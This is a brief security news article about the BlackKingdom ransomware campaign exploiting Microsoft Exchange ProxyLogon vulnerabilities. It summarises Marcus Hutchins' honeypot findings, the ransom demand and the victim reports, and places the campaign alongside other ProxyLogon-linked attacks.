A security researcher Marcus Hutchins, aka MalwareTechBlog, reported new ransomware operation known as “BlackKingdom” exploiting the Microsoft Exchange Server ProxyLogon vulnerabilities.
Over the weekend, Marcus Hutchins tweeted that a threat actor was targeting Microsoft Exchange servers by exploiting the ProxyLogon vulnerabilities and deploying ransomware.
Having analyzed his honeypot logs, Hutchins determined the threat actor executed a PowerShell script that downloaded the ransomware executable from “yuuuuu44[.]com” website. The attacker then distributes the malware to other computers on the network. The ransomware proceeds by encrypting files and assigning them random extensions and then creating a ransom note in the decrypt_file.TxT file.
Honeypots are devices that threat researchers use to lure attackers and monitor their activities as they interact with honeypots.
According to reports on the ransomware identification site ID Ransomware, the BlackKingdom campaign has been encrypting victim’s devices since March 18th. Michael Gillespie, the creator of ID Ransomware, says his system has received over 30 submissions from victims in the USA, Canada, Switzerland, Austria, Russia, France, Israel, United Kingdom, Germany, Italy, Greece, Australia, and Croatia.
The attackers demand $10,000 in bitcoin payable to one same Bitcoin address (1Lf8ZzcEhhRiXpk6YNQFpCJcUisiXb34FT). The address received only one payment on March 18th.
BlackKingdom is the second known ransomware exploiting the Microsoft Exchange ProxyLogon vulnerabilities. The first was the previously unknown family of ransomware DearCry ransomware that was used in attacks earlier this month.
Worth mentioning, last week, Acer suffered a REvil ransomware attack that is suspected to have been exploiting ProxyLogon vulnerabilities, too. Attackers are demanding from the company the largest ransom in history – $50 million. However, the Taiwanese electronics maker hasn’t confirmed the news.
Last week, ESET said at least 10 state-backed hacking groups were now trying to exploit the Microsoft Exchange flaws.